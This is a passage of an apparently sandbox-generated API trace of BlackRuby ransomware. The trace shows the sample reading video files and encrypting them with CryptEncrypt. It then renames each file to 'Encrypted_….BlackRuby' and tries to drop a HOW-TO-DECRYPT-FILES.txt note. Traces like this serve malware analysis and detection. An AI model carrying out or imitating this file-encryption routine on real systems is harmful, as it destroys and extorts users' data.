lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", lpFilePart=0x0) returned 0x3d [0063.435] GetLastError () returned 0x5 [0063.435] SetErrorMode (uMode=0x1) returned 0x0 [0063.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\k dgd2m1tpxz9j.flv"), fInfoLevelId=0x0, lpFileInformation=0x1ba80a0 | out: lpFileInformation=0x1ba80a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26f4a5e0, ftCreationTime.dwHighDateTime=0x1d35174, ftLastAccessTime.dwLowDateTime=0xaa5439e0, ftLastAccessTime.dwHighDateTime=0x1d357b5, ftLastWriteTime.dwLowDateTime=0xaa5439e0, ftLastWriteTime.dwHighDateTime=0x1d357b5, nFileSizeHigh=0x0, nFileSizeLow=0x457)) returned 1 [0063.435] GetLastError () returned 0x5 [0063.435] SetErrorMode (uMode=0x0) returned 0x1 [0063.436] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", lpFilePart=0x0) returned 0x3d [0063.436] GetLastError () returned 0x5 [0063.436] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", lpFilePart=0x0) returned 0x3d [0063.436] GetLastError () returned 0x5 [0063.436] SetErrorMode (uMode=0x1) returned 0x0 [0063.436] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\k dgd2m1tpxz9j.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.436] GetLastError () returned 0x0 [0063.436] GetFileType (hFile=0x258) returned 0x1 [0063.436] SetErrorMode (uMode=0x0) returned 0x1 [0063.436] GetFileType (hFile=0x258) returned 0x1 [0063.436] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x457 [0063.436] GetLastError () returned 0x0 [0063.436] ReadFile (in: hFile=0x258, lpBuffer=0x1baa48c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1baa48c*, lpNumberOfBytesRead=0x18ed18*=0x457, lpOverlapped=0x0) returned 1 [0063.437] GetLastError () returned 0x0 [0063.437] CloseHandle (hObject=0x258) returned 1 [0063.437] GetLastError () returned 0x0 [0063.437] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", lpFilePart=0x0) returned 0x3d [0063.437] GetLastError () returned 0x0 [0063.437] SetErrorMode (uMode=0x1) returned 0x0 [0063.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\k dgd2m1tpxz9j.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26f4a5e0, ftCreationTime.dwHighDateTime=0x1d35174, ftLastAccessTime.dwLowDateTime=0xaa5439e0, ftLastAccessTime.dwHighDateTime=0x1d357b5, ftLastWriteTime.dwLowDateTime=0xaa5439e0, ftLastWriteTime.dwHighDateTime=0x1d357b5, nFileSizeHigh=0x0, nFileSizeLow=0x457)) returned 1 [0063.437] GetLastError () returned 0x0 [0063.437] SetErrorMode (uMode=0x0) returned 0x1 [0063.448] CryptImportKey (in: hProv=0x37c790, pbData=0x1c05cbc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360f60) returned 1 [0063.448] GetLastError () returned 0x0 [0063.448] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.448] GetLastError () returned 0x0 [0063.453] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.454] GetLastError () returned 0x0 [0063.454] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360b20) returned 1 [0063.454] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.454] GetLastError () returned 0x0 [0063.454] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1c32d08*=0x1, dwFlags=0x0) returned 1 [0063.454] GetLastError () returned 0x0 [0063.454] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1c32cd4, dwFlags=0x0) returned 1 [0063.454] GetLastError () returned 0x0 [0063.454] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c32d50*, pdwDataLen=0x18ed08*=0x550, dwBufLen=0x550 | out: pbData=0x1c32d50*, pdwDataLen=0x18ed08*=0x550) returned 1 [0063.454] GetLastError () returned 0x0 [0063.454] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c3381c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c3381c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0063.454] GetLastError () returned 0x0 [0063.454] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c3384c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c3384c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0063.454] GetLastError () returned 0x0 [0063.454] CryptDestroyKey (hKey=0x360f60) returned 1 [0063.454] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.454] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.454] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", lpFilePart=0x0) returned 0x3d [0063.454] GetLastError () returned 0x0 [0063.454] SetErrorMode (uMode=0x1) returned 0x0 [0063.455] GetFileType (hFile=0x258) returned 0x1 [0063.455] SetErrorMode (uMode=0x0) returned 0x1 [0063.455] GetFileType (hFile=0x258) returned 0x1 [0063.455] WriteFile (in: hFile=0x258, lpBuffer=0x1c34ab4*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x18ecec, lpOverlapped=0x0 | out: lpBuffer=0x1c34ab4*, lpNumberOfBytesWritten=0x18ecec*=0x560, lpOverlapped=0x0) returned 1 [0063.456] GetLastError () returned 0xb7 [0063.456] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\k dgd2m1tpxz9j.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_rOyb2CrvBxppdIaz60GazdJEIbaTrkNs4tQ6FStAA9.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\encrypted_royb2crvbxppdiaz60gazdjeibatrkns4tq6fstaa9.blackruby")) returned 1 [0063.457] GetLastError () returned 0xb7 [0063.458] SetErrorMode (uMode=0x0) returned 0x1 [0063.458] GetFileType (hFile=0x258) returned 0x1 [0063.458] SetErrorMode (uMode=0x0) returned 0x1 [0063.458] GetFileType (hFile=0x258) returned 0x1 [0063.458] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xac3d [0063.458] GetLastError () returned 0x0 [0063.458] ReadFile (in: hFile=0x258, lpBuffer=0x1c548cc, nNumberOfBytesToRead=0xac3d, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c548cc*, lpNumberOfBytesRead=0x18ed18*=0xac3d, lpOverlapped=0x0) returned 1 [0063.459] GetLastError () returned 0x0 [0063.470] CryptImportKey (in: hProv=0x37c818, pbData=0x1cc4518, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360aa0) returned 1 [0063.470] GetLastError () returned 0x0 [0063.470] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.470] GetLastError () returned 0x0 [0063.475] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.475] GetLastError () returned 0x0 [0063.475] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ae0) returned 1 [0063.475] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.475] GetLastError () returned 0x0 [0063.475] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1cf1564*=0x1, dwFlags=0x0) returned 1 [0063.475] GetLastError () returned 0x0 [0063.475] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1cf1530, dwFlags=0x0) returned 1 [0063.475] GetLastError () returned 0x0 [0063.475] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf15ac*, pdwDataLen=0x18ed08*=0xad30, dwBufLen=0xad30 | out: pbData=0x1cf15ac*, pdwDataLen=0x18ed08*=0xad30) returned 1 [0063.475] GetLastError () returned 0x0 [0063.475] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d07038*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1d07038*, pdwDataLen=0x18ed20*=0x10) returned 1 [0063.476] GetLastError () returned 0x0 [0063.476] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d07068*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1d07068*, pdwDataLen=0x18ed28*=0x10) returned 1 [0063.476] GetLastError () returned 0x0 [0063.476] CryptDestroyKey (hKey=0x360aa0) returned 1 [0063.476] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.476] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.476] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\pGCeK3iGWfFr.mkv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\pGCeK3iGWfFr.mkv", lpFilePart=0x0) returned 0x3b [0063.476] GetLastError () returned 0x0 [0063.476] SetErrorMode (uMode=0x1) returned 0x0 [0063.477] GetFileType (hFile=0x258) returned 0x1 [0063.477] SetErrorMode (uMode=0x0) returned 0x1 [0063.477] GetFileType (hFile=0x258) returned 0x1 [0063.477] WriteFile (in: hFile=0x258, lpBuffer=0x1d07098*, nNumberOfBytesToWrite=0xad40, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1d07098*, lpNumberOfBytesWritten=0x18ed24*=0xad40, lpOverlapped=0x0) returned 1 [0063.478] GetLastError () returned 0xb7 [0063.478] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\pGCeK3iGWfFr.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\pgcek3igwffr.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_GsBN9vOmi1X9RnwIOY5afAXhwVscwHKuQ85WT3Pg.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\encrypted_gsbn9vomi1x9rnwioy5afaxhwvscwhkuq85wt3pg.blackruby")) returned 1 [0063.479] GetLastError () returned 0xb7 [0063.480] SetErrorMode (uMode=0x0) returned 0x1 [0063.480] GetFileType (hFile=0x258) returned 0x1 [0063.480] SetErrorMode (uMode=0x0) returned 0x1 [0063.480] GetFileType (hFile=0x258) returned 0x1 [0063.480] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xfaad [0063.480] GetLastError () returned 0x0 [0063.481] ReadFile (in: hFile=0x258, lpBuffer=0x1d30c48, nNumberOfBytesToRead=0xfaad, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1d30c48*, lpNumberOfBytesRead=0x18ed18*=0xfaad, lpOverlapped=0x0) returned 1 [0063.481] GetLastError () returned 0x0 [0063.518] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1baee04, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360b60) returned 1 [0063.518] GetLastError () returned 0x0 [0063.518] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.518] GetLastError () returned 0x0 [0063.523] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.523] GetLastError () returned 0x0 [0063.523] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ea0) returned 1 [0063.523] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.523] GetLastError () returned 0x0 [0063.523] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1bdbe50*=0x1, dwFlags=0x0) returned 1 [0063.523] GetLastError () returned 0x0 [0063.523] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1bdbe1c, dwFlags=0x0) returned 1 [0063.523] GetLastError () returned 0x0 [0063.523] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bdbe98*, pdwDataLen=0x18ed08*=0xfba0, dwBufLen=0xfba0 | out: pbData=0x1bdbe98*, pdwDataLen=0x18ed08*=0xfba0) returned 1 [0063.524] GetLastError () returned 0x0 [0063.524] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bfb604*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bfb604*, pdwDataLen=0x18ed20*=0x10) returned 1 [0063.524] GetLastError () returned 0x0 [0063.524] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bfb634*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bfb634*, pdwDataLen=0x18ed28*=0x10) returned 1 [0063.524] GetLastError () returned 0x0 [0063.525] CryptDestroyKey (hKey=0x360b60) returned 1 [0063.525] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.525] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.525] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\V7lp Rm.mkv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\V7lp Rm.mkv", lpFilePart=0x0) returned 0x36 [0063.525] GetLastError () returned 0x0 [0063.525] SetErrorMode (uMode=0x1) returned 0x0 [0063.525] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\V7lp Rm.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\v7lp rm.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.526] GetLastError () returned 0xb7 [0063.526] GetFileType (hFile=0x258) returned 0x1 [0063.526] SetErrorMode (uMode=0x0) returned 0x1 [0063.526] GetFileType (hFile=0x258) returned 0x1 [0063.528] CloseHandle (hObject=0x258) returned 1 [0063.528] GetLastError () returned 0xb7 [0063.528] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\V7lp Rm.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\V7lp Rm.mkv", lpFilePart=0x0) returned 0x36 [0063.528] GetLastError () returned 0xb7 [0063.528] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_eF1p7GRjWZW96CwkEQSqVZjqW1hSh6lmEIS2H.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_eF1p7GRjWZW96CwkEQSqVZjqW1hSh6lmEIS2H.BlackRuby", lpFilePart=0x0) returned 0x64 [0063.528] GetLastError () returned 0xb7 [0063.528] SetErrorMode (uMode=0x1) returned 0x0 [0063.528] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\V7lp Rm.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\v7lp rm.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a9d6a0, ftCreationTime.dwHighDateTime=0x1d34cd6, ftLastAccessTime.dwLowDateTime=0x61d04710, ftLastAccessTime.dwHighDateTime=0x1d35731, ftLastWriteTime.dwLowDateTime=0x2e101060, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xfbb0)) returned 1 [0063.528] GetLastError () returned 0xb7 [0063.528] SetErrorMode (uMode=0x0) returned 0x1 [0063.528] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\V7lp Rm.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\v7lp rm.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_eF1p7GRjWZW96CwkEQSqVZjqW1hSh6lmEIS2H.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\encrypted_ef1p7grjwzw96cwkeqsqvzjqw1hsh6lmeis2h.blackruby")) returned 1 [0063.529] GetLastError () returned 0xb7 [0063.529] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0063.529] GetLastError () returned 0xb7 [0063.529] SetErrorMode (uMode=0x1) returned 0x0 [0063.529] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0063.529] GetLastError () returned 0x5 [0063.531] SetErrorMode (uMode=0x0) returned 0x1 [0063.531] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm", lpFilePart=0x0) returned 0x3b [0063.531] GetLastError () returned 0x5 [0063.531] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0063.531] GetLastError () returned 0x5 [0063.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0063.531] GetLastError () returned 0x5 [0063.531] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm", lpFilePart=0x0) returned 0x3b [0063.531] GetLastError () returned 0x5 [0063.531] SetErrorMode (uMode=0x1) returned 0x0 [0063.531] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0063.531] GetLastError () returned 0x5 [0063.531] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.531] GetLastError () returned 0x5 [0063.532] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.532] GetLastError () returned 0x5 [0063.532] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.532] GetLastError () returned 0x5 [0063.532] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0063.532] GetLastError () returned 0x12 [0063.532] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0063.532] SetErrorMode (uMode=0x0) returned 0x1 [0063.532] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm", lpFilePart=0x0) returned 0x3b [0063.532] GetLastError () returned 0x12 [0063.532] SetErrorMode (uMode=0x1) returned 0x0 [0063.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0063.532] GetLastError () returned 0x12 [0063.532] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.532] GetLastError () returned 0x12 [0063.533] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.533] GetLastError () returned 0x12 [0063.533] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.533] GetLastError () returned 0x12 [0063.533] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0063.533] GetLastError () returned 0x12 [0063.533] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0063.533] SetErrorMode (uMode=0x0) returned 0x1 [0063.533] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", lpFilePart=0x0) returned 0x46 [0063.533] GetLastError () returned 0x12 [0063.533] SetErrorMode (uMode=0x1) returned 0x0 [0063.533] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\mosmxe.flv"), fInfoLevelId=0x0, lpFileInformation=0x1c29d30 | out: lpFileInformation=0x1c29d30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c3a240, ftCreationTime.dwHighDateTime=0x1d35325, ftLastAccessTime.dwLowDateTime=0x22c20e30, ftLastAccessTime.dwHighDateTime=0x1d34a6d, ftLastWriteTime.dwLowDateTime=0x22c20e30, ftLastWriteTime.dwHighDateTime=0x1d34a6d, nFileSizeHigh=0x0, nFileSizeLow=0x325e)) returned 1 [0063.533] GetLastError () returned 0x12 [0063.533] SetErrorMode (uMode=0x0) returned 0x1 [0063.534] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", lpFilePart=0x0) returned 0x46 [0063.534] GetLastError () returned 0x12 [0063.534] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", lpFilePart=0x0) returned 0x46 [0063.534] GetLastError () returned 0x12 [0063.534] SetErrorMode (uMode=0x1) returned 0x0 [0063.534] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\nynaknfak05jb1tm\\mosmxe.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.534] GetLastError () returned 0x0 [0063.534] GetFileType (hFile=0x258) returned 0x1 [0063.534] SetErrorMode (uMode=0x0) returned 0x1 [0063.534] GetFileType (hFile=0x258) returned 0x1 [0063.534] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x325e [0063.534] GetLastError () returned 0x0 [0063.534] ReadFile (in: hFile=0x258, lpBuffer=0x1c2ba54, nNumberOfBytesToRead=0x325e, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1c2ba54*, lpNumberOfBytesRead=0x18ecac*=0x325e, lpOverlapped=0x0) returned 1 [0063.535] GetLastError () returned 0x0 [0063.535] CloseHandle (hObject=0x258) returned 1 [0063.535] GetLastError () returned 0x0 [0063.535] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\NyNAKnfaK05JB1Tm\\mOSmxe.flv", lpFilePart=0x0) returned 0x46 [0063.535] GetLastError () returned 0x0 [0063.535] SetErrorMode 